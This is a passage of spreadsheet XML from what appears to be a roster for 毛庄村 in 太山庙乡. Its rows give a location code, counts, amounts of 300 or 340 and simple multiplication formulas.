      <c r="E2315" s="13" t="s">
        <v>5202</v>
      </c>
      <c r="F2315" s="14">
        <f>F2314</f>
        <v>4113210704</v>
      </c>
      <c r="G2315" s="14"/>
      <c r="H2315" s="14"/>
      <c r="I2315" s="14"/>
      <c r="J2315" s="14"/>
      <c r="K2315" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2316" ht="23" customHeight="1" spans="1:11">
      <c r="A2316" s="13" t="s">
        <v>6068</v>
      </c>
      <c r="B2316" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2316" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2316" s="14" t="s">
        <v>6069</v>
      </c>
      <c r="E2316" s="14" t="s">
        <v>4526</v>
      </c>
      <c r="F2316" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2316" s="14">
        <v>2</v>
      </c>
      <c r="H2316" s="14">
        <v>300</v>
      </c>
      <c r="I2316" s="14">
        <f>H2316*G2316</f>
        <v>600</v>
      </c>
      <c r="J2316" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2316" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2317" ht="23" customHeight="1" spans="1:11">
      <c r="A2317" s="13" t="s">
        <v>6070</v>
      </c>
      <c r="B2317" s="14" t="str">
        <f>B2316</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2317" s="14" t="str">
        <f>C2316</f>
        <v>毛庄村</v>
      </c>
      <c r="D2317" s="13" t="s">
        <v>6071</v>
      </c>
      <c r="E2317" s="20" t="s">
        <v>5647</v>
      </c>
      <c r="F2317" s="14">
        <f>F2316</f>
        <v>4113210704</v>
      </c>
      <c r="G2317" s="14"/>
      <c r="H2317" s="14"/>
      <c r="I2317" s="14"/>
      <c r="J2317" s="14"/>
      <c r="K2317" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2318" ht="23" customHeight="1" spans="1:11">
      <c r="A2318" s="13" t="s">
        <v>6072</v>
      </c>
      <c r="B2318" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2318" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2318" s="14" t="s">
        <v>6073</v>
      </c>
      <c r="E2318" s="14" t="s">
        <v>5642</v>
      </c>
      <c r="F2318" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2318" s="14">
        <v>1</v>
      </c>
      <c r="H2318" s="14">
        <v>340</v>
      </c>
      <c r="I2318" s="14">
        <f>H2318*G2318</f>
        <v>340</v>
      </c>
      <c r="J2318" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2318" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2319" ht="23" customHeight="1" spans="1:11">
      <c r="A2319" s="13" t="s">
        <v>6074</v>
      </c>
      <c r="B2319" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2319" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2319" s="14" t="s">
        <v>6075</v>
      </c>
      <c r="E2319" s="14" t="s">
        <v>6076</v>
      </c>
      <c r="F2319" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2319" s="14">
        <v>2</v>
      </c>
      <c r="H2319" s="14">
        <v>300</v>
      </c>
      <c r="I2319" s="14">
        <f>H2319*G2319</f>
        <v>600</v>
      </c>
      <c r="J2319" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2319" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2320" ht="23" customHeight="1" spans="1:11">
      <c r="A2320" s="13" t="s">
        <v>6077</v>
      </c>
      <c r="B2320" s="14" t="str">
        <f>B2319</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2320" s="14" t="str">
        <f>C2319</f>
        <v>毛庄村</v>
      </c>
      <c r="D2320" s="13" t="s">
        <v>6078</v>
      </c>
      <c r="E2320" s="14" t="s">
        <v>6079</v>
      </c>
      <c r="F2320" s="14">
        <f>F2319</f>
        <v>4113210704</v>
      </c>
      <c r="G2320" s="14"/>
      <c r="H2320" s="14"/>
      <c r="I2320" s="14"/>
      <c r="J2320" s="14"/>
      <c r="K2320" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2321" ht="23" customHeight="1" spans="1:11">
      <c r="A2321" s="13" t="s">
        <v>6080</v>
      </c>
      <c r="B2321" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2321" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2321" s="14" t="s">
        <v>6081</v>
      </c>
      <c r="E2321" s="14" t="s">
        <v>2879</v>
      </c>
      <c r="F2321" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2321" s="14">
        <v>1</v>
      </c>
      <c r="H2321" s="14">
        <v>340</v>
      </c>
      <c r="I2321" s="14">
        <f>H2321*G2321</f>
        <v>340</v>
      </c>
      <c r="J2321" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2321" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2322" ht="23" customHeight="1" spans="1:11">
      <c r="A2322" s="13" t="s">
        <v>6082</v>
      </c>
      <c r="B2322" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2322" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2322" s="14" t="s">
        <v>6083</v>
      </c>
      <c r="E2322" s="14" t="s">
        <v>5694</v>
      </c>
      <c r="F2322" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2322" s="14">
        <v>1</v>
      </c>
      <c r="H2322" s="14">
        <v>340</v>
      </c>
      <c r="I2322" s="14">
        <f>H2322*G2322</f>
        <v>340</v>
      </c>
      <c r="J2322" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2322" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2323" ht="23" customHeight="1" spans="1:11">
      <c r="A2323" s="13" t="s">
        <v>6084</v>
      </c>
      <c r="B2323" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2323" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2323" s="14" t="s">
        <v>6085</v>
      </c>
      <c r="E2323" s="14" t="s">
        <v>6086</v>
      </c>
      <c r="F2323" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2323" s="14">
        <v>1</v>
      </c>
      <c r="H2323" s="14">
        <v>340</v>
      </c>
      <c r="I2323" s="14">
        <f>H2323*G2323</f>
        <v>340</v>
      </c>
      <c r="J2323" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2323" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2324" ht="23" customHeight="1" spans="1:11">
      <c r="A2324" s="13" t="s">
        <v>6087</v>
      </c>
      <c r="B2324" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2324" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2324" s="14" t="s">
        <v>6088</v>
      </c>
      <c r="E2324" s="14" t="s">
        <v>5600</v>
      </c>
      <c r="F2324" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2324" s="14">
        <v>1</v>
      </c>
      <c r="H2324" s="14">
        <v>340</v>
      </c>
      <c r="I2324" s="14">
        <f>H2324*G2324</f>
        <v>340</v>
      </c>
      <c r="J2324" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2324" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2325" ht="23" customHeight="1" spans="1:11">
      <c r="A2325" s="13" t="s">
        <v>6089</v>
      </c>
      <c r="B2325" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2325" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2325" s="14" t="s">
        <v>6090</v>
      </c>
      <c r="E2325" s="14" t="s">
        <v>6091</v>
      </c>
      <c r="F2325" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2325" s="14">
        <v>2</v>
      </c>
      <c r="H2325" s="14">
        <v>300</v>
      </c>
      <c r="I2325" s="14">
        <f>H2325*G2325</f>
        <v>600</v>
      </c>
      <c r="J2325" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2325" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2326" ht="23" customHeight="1" spans="1:11">
      <c r="A2326" s="13" t="s">
        <v>6092</v>
      </c>
      <c r="B2326" s="14" t="str">
        <f>B2325</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2326" s="14" t="str">
        <f>C2325</f>
        <v>毛庄村</v>
      </c>
      <c r="D2326" s="13" t="s">
        <v>6093</v>
      </c>
      <c r="E2326" s="14" t="s">
        <v>5738</v>
      </c>
      <c r="F2326" s="14">
        <f>F2325</f>
        <v>4113210704</v>
      </c>
      <c r="G2326" s="14"/>
      <c r="H2326" s="14"/>
      <c r="I2326" s="14"/>
      <c r="J2326" s="14"/>
      <c r="K2326" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2327" ht="23" customHeight="1" spans="1:11">
      <c r="A2327" s="13" t="s">
        <v>6094</v>
      </c>
      <c r="B2327" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2327" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2327" s="14" t="s">
        <v>6095</v>
      </c>
      <c r="E2327" s="14" t="s">
        <v>6096</v>
      </c>
      <c r="F2327" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2327" s="14">
        <v>1</v>
      </c>
      <c r="H2327" s="14">
        <v>340</v>
      </c>
      <c r="I2327" s="14">
        <f>H2327*G2327</f>
        <v>340</v>
      </c>
      <c r="J2327" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2327" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2328" ht="23" customHeight="1" spans="1:11">
      <c r="A2328" s="13" t="s">
        <v>6097</v>
      </c>
      <c r="B2328" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2328" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2328" s="14" t="s">
        <v>6098</v>
      </c>
      <c r="E2328" s="14" t="s">
        <v>5694</v>
      </c>
      <c r="F2328" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2328" s="14">
        <v>1</v>
      </c>
      <c r="H2328" s="14">
        <v>340</v>
      </c>
      <c r="I2328" s="14">
        <f>H2328*G2328</f>
        <v>340</v>
      </c>
      <c r="J2328" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2328" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2329" ht="23" customHeight="1" spans="1:11">
      <c r="A2329" s="13" t="s">
        <v>6099</v>
      </c>
      <c r="B2329" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2329" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2329" s="14" t="s">
        <v>6100</v>
      </c>
      <c r="E2329" s="14" t="s">
        <v>6101</v>
      </c>
      <c r="F2329" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2329" s="14">
        <v>1</v>
      </c>
      <c r="H2329" s="14">
        <v>340</v>
      </c>
      <c r="I2329" s="14">
        <f>H2329*G2329</f>
        <v>340</v>
      </c>
      <c r="J2329" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2329" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2330" ht="23" customHeight="1" spans="1:11">
      <c r="A2330" s="13" t="s">
        <v>6102</v>
      </c>
      <c r="B2330" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2330" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2330" s="14" t="s">
        <v>6103</v>
      </c>
      <c r="E2330" s="14" t="s">
        <v>6104</v>
      </c>
      <c r="F2330" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2330" s="14">
        <v>2</v>
      </c>
      <c r="H2330" s="14">
        <v>300</v>
      </c>
      <c r="I2330" s="14">
        <f>H2330*G2330</f>
        <v>600</v>
      </c>
      <c r="J2330" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2330" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2331" ht="23" customHeight="1" spans="1:11">
      <c r="A2331" s="13" t="s">
        <v>6105</v>
      </c>
      <c r="B2331" s="14" t="str">
        <f>B2330</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2331" s="14" t="str">
        <f>C2330</f>
        <v>毛庄村</v>
      </c>
      <c r="D2331" s="13" t="s">
        <v>6106</v>
      </c>
      <c r="E2331" s="14" t="s">
        <v>5620</v>
      </c>
      <c r="F2331" s="14">
        <f>F2330</f>
        <v>4113210704</v>
      </c>
      <c r="G2331" s="14"/>
      <c r="H2331" s="14"/>
      <c r="I2331" s="14"/>
      <c r="J2331" s="14"/>
      <c r="K2331" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2332" ht="23" customHeight="1" spans="1:11">
      <c r="A2332" s="13" t="s">
        <v>6107</v>
      </c>
      <c r="B2332" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2332" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2332" s="14" t="s">
        <v>6108</v>
      </c>
      <c r="E2332" s="14" t="s">
        <v>5653</v>
      </c>
      <c r="F2332" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2332" s="14">
        <v>2</v>
      </c>
      <c r="H2332" s="14">
        <v>300</v>
      </c>
      <c r="I2332" s="14">
        <f>H2332*G2332</f>
        <v>600</v>
      </c>
      <c r="J2332" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2332" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2333" ht="23" customHeight="1" spans="1:11">
      <c r="A2333" s="13" t="s">
        <v>6109</v>
      </c>
      <c r="B2333" s="14" t="str">
        <f>B2332</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2333" s="14" t="str">
        <f>C2332</f>
        <v>毛庄村</v>
      </c>
      <c r="D2333" s="13" t="s">
        <v>6110</v>
      </c>
      <c r="E2333" s="14" t="s">
        <v>5639</v>
      </c>
      <c r="F2333" s="14">
        <f>F2332</f>
        <v>4113210704</v>
      </c>
      <c r="G2333" s="14"/>
      <c r="H2333" s="14"/>
      <c r="I2333" s="14"/>
      <c r="J2333" s="14"/>
      <c r="K2333" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2334" ht="23" customHeight="1" spans="1:11">
      <c r="A2334" s="13" t="s">
        <v>6111</v>
      </c>
      <c r="B2334" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2334" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2334" s="14" t="s">
        <v>6112</v>
      </c>
      <c r="E2334" s="14" t="s">
        <v>3633</v>
      </c>
      <c r="F2334" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2334" s="14">
        <v>1</v>
      </c>
      <c r="H2334" s="14">
        <v>340</v>
      </c>
      <c r="I2334" s="14">
        <f t="shared" ref="I2334:I2362" si="110">H2334*G2334</f>
        <v>340</v>
      </c>
      <c r="J2334" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2334" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2335" ht="23" customHeight="1" spans="1:11">
      <c r="A2335" s="13" t="s">
        <v>6113</v>
      </c>
      <c r="B2335" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2335" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2335" s="14" t="s">
        <v>6114</v>
      </c>
      <c r="E2335" s="14" t="s">
        <v>2282</v>
      </c>
      <c r="F2335" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2335" s="14">
        <v>1</v>
      </c>
      <c r="H2335" s="14">
        <v>340</v>
      </c>
      <c r="I2335" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2335" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2335" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2336" ht="23" customHeight="1" spans="1:11">
      <c r="A2336" s="13" t="s">
        <v>6115</v>
      </c>
      <c r="B2336" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2336" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2336" s="14" t="s">
        <v>6116</v>
      </c>
      <c r="E2336" s="14" t="s">
        <v>5724</v>
      </c>
      <c r="F2336" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2336" s="14">
        <v>1</v>
      </c>
      <c r="H2336" s="14">
        <v>340</v>
      </c>
      <c r="I2336" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2336" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2336" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2337" ht="23" customHeight="1" spans="1:11">
      <c r="A2337" s="13" t="s">
        <v>6117</v>
      </c>
      <c r="B2337" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2337" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2337" s="14" t="s">
        <v>6118</v>
      </c>
      <c r="E2337" s="14" t="s">
        <v>5605</v>
      </c>
      <c r="F2337" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2337" s="14">
        <v>1</v>
      </c>
      <c r="H2337" s="14">
        <v>340</v>
      </c>
      <c r="I2337" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2337" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2337" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2338" ht="23" customHeight="1" spans="1:11">
      <c r="A2338" s="13" t="s">
        <v>6119</v>
      </c>
      <c r="B2338" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2338" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2338" s="14" t="s">
        <v>6120</v>
      </c>
      <c r="E2338" s="14" t="s">
        <v>6096</v>
      </c>
      <c r="F2338" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2338" s="14">
        <v>1</v>
      </c>
      <c r="H2338" s="14">
        <v>340</v>
      </c>
      <c r="I2338" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2338" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2338" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2339" ht="23" customHeight="1" spans="1:11">
      <c r="A2339" s="13" t="s">
        <v>6121</v>
      </c>
      <c r="B2339" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2339" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2339" s="14" t="s">
        <v>6122</v>
      </c>
      <c r="E2339" s="14" t="s">
        <v>5810</v>
      </c>
      <c r="F2339" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2339" s="14">
        <v>1</v>
      </c>
      <c r="H2339" s="14">
        <v>340</v>
      </c>
      <c r="I2339" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2339" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2339" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2340" ht="23" customHeight="1" spans="1:11">
      <c r="A2340" s="13" t="s">
        <v>6123</v>
      </c>
      <c r="B2340" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2340" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2340" s="14" t="s">
        <v>6124</v>
      </c>
      <c r="E2340" s="14" t="s">
        <v>5877</v>
      </c>
      <c r="F2340" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2340" s="14">
        <v>1</v>
      </c>
      <c r="H2340" s="14">
        <v>340</v>
      </c>
      <c r="I2340" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2340" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2340" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2341" ht="23" customHeight="1" spans="1:11">
      <c r="A2341" s="13" t="s">
        <v>6125</v>
      </c>
      <c r="B2341" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2341" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2341" s="14" t="s">
        <v>6126</v>
      </c>
      <c r="E2341" s="14" t="s">
        <v>5732</v>
      </c>
      <c r="F2341" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2341" s="14">
        <v>1</v>
      </c>
      <c r="H2341" s="14">
        <v>340</v>
      </c>
      <c r="I2341" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2341" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2341" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2342" ht="23" customHeight="1" spans="1:11">
      <c r="A2342" s="13" t="s">
        <v>6127</v>
      </c>
      <c r="B2342" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2342" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2342" s="14" t="s">
        <v>6128</v>
      </c>
      <c r="E2342" s="14" t="s">
        <v>5874</v>
      </c>
      <c r="F2342" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2342" s="14">
        <v>1</v>
      </c>
      <c r="H2342" s="14">
        <v>340</v>
      </c>
      <c r="I2342" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2342" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2342" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2343" ht="23" customHeight="1" spans="1:11">
      <c r="A2343" s="13" t="s">
        <v>6129</v>
      </c>
      <c r="B2343" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2343" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2343" s="14" t="s">
        <v>6130</v>
      </c>
      <c r="E2343" s="14" t="s">
        <v>5688</v>
      </c>
      <c r="F2343" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2343" s="14">
        <v>1</v>
      </c>
      <c r="H2343" s="14">
        <v>340</v>
      </c>
      <c r="I2343" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2343" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2343" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2344" ht="23" customHeight="1" spans="1:11">
      <c r="A2344" s="13" t="s">
        <v>6131</v>
      </c>
      <c r="B2344" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2344" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2344" s="14" t="s">
        <v>6132</v>
      </c>
      <c r="E2344" s="14" t="s">
        <v>6096</v>
      </c>
      <c r="F2344" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2344" s="14">
        <v>1</v>
      </c>
      <c r="H2344" s="14">
        <v>340</v>
      </c>
      <c r="I2344" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2344" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2344" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2345" ht="23" customHeight="1" spans="1:11">
      <c r="A2345" s="13" t="s">
        <v>6133</v>
      </c>
      <c r="B2345" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2345" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2345" s="14" t="s">
        <v>6134</v>
      </c>
      <c r="E2345" s="14" t="s">
        <v>6135</v>
      </c>
      <c r="F2345" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2345" s="14">
        <v>1</v>
      </c>
      <c r="H2345" s="14">
        <v>340</v>
      </c>
      <c r="I2345" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2345" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2345" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2346" ht="23" customHeight="1" spans="1:11">
      <c r="A2346" s="13" t="s">
        <v>6136</v>
      </c>
      <c r="B2346" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2346" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2346" s="14" t="s">
        <v>6137</v>
      </c>
      <c r="E2346" s="14" t="s">
        <v>5647</v>
      </c>
      <c r="F2346" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2346" s="14">
        <v>1</v>
      </c>
      <c r="H2346" s="14">
        <v>340</v>
      </c>
      <c r="I2346" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2346" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2346" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2347" ht="23" customHeight="1" spans="1:11">
      <c r="A2347" s="13" t="s">
        <v>6138</v>
      </c>
      <c r="B2347" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2347" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2347" s="14" t="s">
        <v>6139</v>
      </c>
      <c r="E2347" s="14" t="s">
        <v>5665</v>
      </c>
      <c r="F2347" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2347" s="14">
        <v>1</v>
      </c>
      <c r="H2347" s="14">
        <v>340</v>
      </c>
      <c r="I2347" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2347" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2347" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2348" ht="23" customHeight="1" spans="1:11">
      <c r="A2348" s="13" t="s">
        <v>6140</v>
      </c>
      <c r="B2348" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2348" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2348" s="14" t="s">
        <v>6141</v>
      </c>
      <c r="E2348" s="14" t="s">
        <v>5755</v>
      </c>
      <c r="F2348" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2348" s="14">
        <v>1</v>
      </c>
      <c r="H2348" s="14">
        <v>340</v>
      </c>
      <c r="I2348" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2348" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2348" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2349" ht="23" customHeight="1" spans="1:11">
      <c r="A2349" s="13" t="s">
        <v>6142</v>
      </c>
      <c r="B2349" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2349" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2349" s="14" t="s">
        <v>6143</v>
      </c>
      <c r="E2349" s="14" t="s">
        <v>6101</v>
      </c>
      <c r="F2349" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2349" s="14">
        <v>1</v>
      </c>
      <c r="H2349" s="14">
        <v>340</v>
      </c>
      <c r="I2349" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2349" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2349" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2350" ht="23" customHeight="1" spans="1:11">
      <c r="A2350" s="13" t="s">
        <v>6144</v>
      </c>
      <c r="B2350" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2350" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="D2350" s="14" t="s">
        <v>6145</v>
      </c>
      <c r="E2350" s="14" t="s">
        <v>6146</v>
      </c>
      <c r="F2350" s="14" t="s">
        <v>5713</v>
      </c>
      <c r="G2350" s="14">
        <v>1</v>
      </c>
      <c r="H2350" s="14">
        <v>340</v>
      </c>
      <c r="I2350" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2350" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2350" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2351" ht="23" customHeight="1" spans="1:11">
      <c r="A2351" s="13" t="s">
        <v>6147</v>
      </c>
      <c r="B2351" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2351" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2351" s="14" t="s">
        <v>6148</v>
      </c>
      <c r="E2351" s="14" t="s">
        <v>6149</v>
      </c>
      <c r="F2351" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2351" s="14">
        <v>1</v>
      </c>
      <c r="H2351" s="14">
        <v>340</v>
      </c>
      <c r="I2351" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2351" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2351" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2352" ht="23" customHeight="1" spans="1:11">
      <c r="A2352" s="13" t="s">
        <v>6150</v>
      </c>
      <c r="B2352" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2352" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="D2352" s="14" t="s">
        <v>6151</v>
      </c>
      <c r="E2352" s="14" t="s">
        <v>5623</v>
      </c>
      <c r="F2352" s="14" t="s">
        <v>6152</v>
      </c>
      <c r="G2352" s="14">
        <v>1</v>
      </c>
      <c r="H2352" s="14">
        <v>340</v>
      </c>
      <c r="I2352" s="14">
        <f t="shared" si="110"/>
        <v>340</v>
      </c>
      <c r="J2352" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2352" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2353" ht="23" customHeight="1" spans="1:11">
      <c r="A2353" s="13" t="s">
        <v>6153</v>
      </c>
      <c r="B2353" s="14" t="s">
        <v>5572</v>
      </c>
      <c r="C2353" s="14" t="s">
        <v>5573</v>
      </c>
      <c r="D2353" s="14" t="s">
        <v>6154</v>
      </c>
      <c r="E2353" s="14" t="s">
        <v>3589</v>
      </c>
      <c r="F2353" s="14">
        <v>4113210704</v>
      </c>
      <c r="G2353" s="14">
        <v>2</v>
      </c>
      <c r="H2353" s="14">
        <v>300</v>
      </c>
      <c r="I2353" s="14">
        <f t="shared" si="110"/>
        <v>600</v>
      </c>
      <c r="J2353" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2353" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2354" ht="23" customHeight="1" spans="1:11">
